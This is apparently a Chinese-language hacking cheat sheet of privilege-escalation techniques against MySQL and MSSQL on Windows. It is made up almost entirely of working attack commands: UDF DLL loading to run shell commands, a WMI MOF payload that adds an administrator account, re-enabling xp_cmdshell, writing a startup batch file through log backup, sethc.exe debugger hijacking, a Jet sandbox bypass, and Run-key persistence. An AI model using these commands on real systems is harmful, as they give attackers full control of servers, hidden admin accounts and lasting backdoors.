UDF手工提权辅助: select @@basedir; #查看mysql安装目录 select 'It is dll' into dumpfile 'C:\。。lib::'; #利用NTFS ADS创建lib目录 select 'It is dll' into dumpfile 'C:\。。lib\plugin::'; #利用NTFS ADS创建plugin目录 select 0xUDFcode into dumpfile 'C:\phpstu\MySQL\lib\plugin\mstlab.dll'; #导出udfcode,注意修改udfcode create function cmdshell returns string soname 'mstlab.dll'; #用udf创建cmd函数,shell,sys_exec,sys_eval select shell('cmd','net user'); #执行cmd命令 show variables like '%plugin%'; #查看plugin路径 小技巧: 1.HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MySQL 注册表中ImagePath的值为mysql安装目录 2.my.ini中datadir的值是数据存放目录 3.UPDATE user set File_priv ='Y'; flush privileges; 强制加file权限 --------------------------------------------------------------------------------------------------------- MOF手工提权辅助: #pragma namespace("\\.\root\subscription") instance of __EventFilter as { EventNamespace = "Root\Cimv2"; Name = "filtP2"; Query = "Select * From __InstanceModificationEvent " "Where TargetInstance Isa \"Win32_LocalTime\" " "And TargetInstance.Second = 5"; QueryLanguage = "WQL"; }; instance of ActiveScriptEventConsumer as { Name = "consPCSV2"; ScriptingEngine = "JScript"; ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\") WSH.run(\"net.exe user admintony admin /add&&net.exe localgroup administrators admintony /add\")"; }; instance of __FilterToConsumerBinding { Consumer = ; Filter = ; }; 保存为 1.mof 然后mysql执行:select load_file('D:/wwwroot/1.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof'; --------------------------------------------------------------------------------------------------------- SA提权辅助: 1.判断扩展存储是否存在: select count(*) from master.dbo.sysobjects where xtype = 'x' AND name= 'xp_cmdshell' select count(*) from master.dbo.sysobjects where name='xp_regread' 恢复: exec sp_dropextendedproc 'xp_cmdshell' exec sp_dropextendedproc xp_cmdshell,'xplog70.dll' EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;(SQL2005) 2.列目录: exec master..xp_cmdshell 'ver' (or) exec master..xp_dirtree 'c:\',1,1 (or) drop table black create TABLE black(mulu varchar(7996) NULL,ID int NOT NULL IDENTITY(1,1))-- insert into black exec master..xp_cmdshell 'dir c:\' select top 1 mulu from black where id=1 xp_cmdshell被删除时,可以用(4.a)开启沙盒模式,然后(4.b)方法提权 3.备份启动项: alter database [master] set RECOVERY FULL create table cmd (a image) backup log [master] to disk = 'c:\cmd1' with init insert into cmd (a) values (0x(batcode)) backup log [master] to disk = 'C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\start.bat' drop table cmd 4.映像劫持 xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','reg_sz','c:\windows\system32\cmd.exe' 5.沙盒模式提权: 法a:exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet.0\Engines','SandBoxMode','REG_DWORD',0; #关闭沙盒模式 法b:Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user mstlab mstlab /add")'); #or c:\windows\system32\ias\dnary.mdb string类型用此。 开启OpenRowSet:exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE; 6.xp_regwrite操作注册表 exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\currentversion un','black','REG_SZ','net user test test /add' 开启xp_oacreate:exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;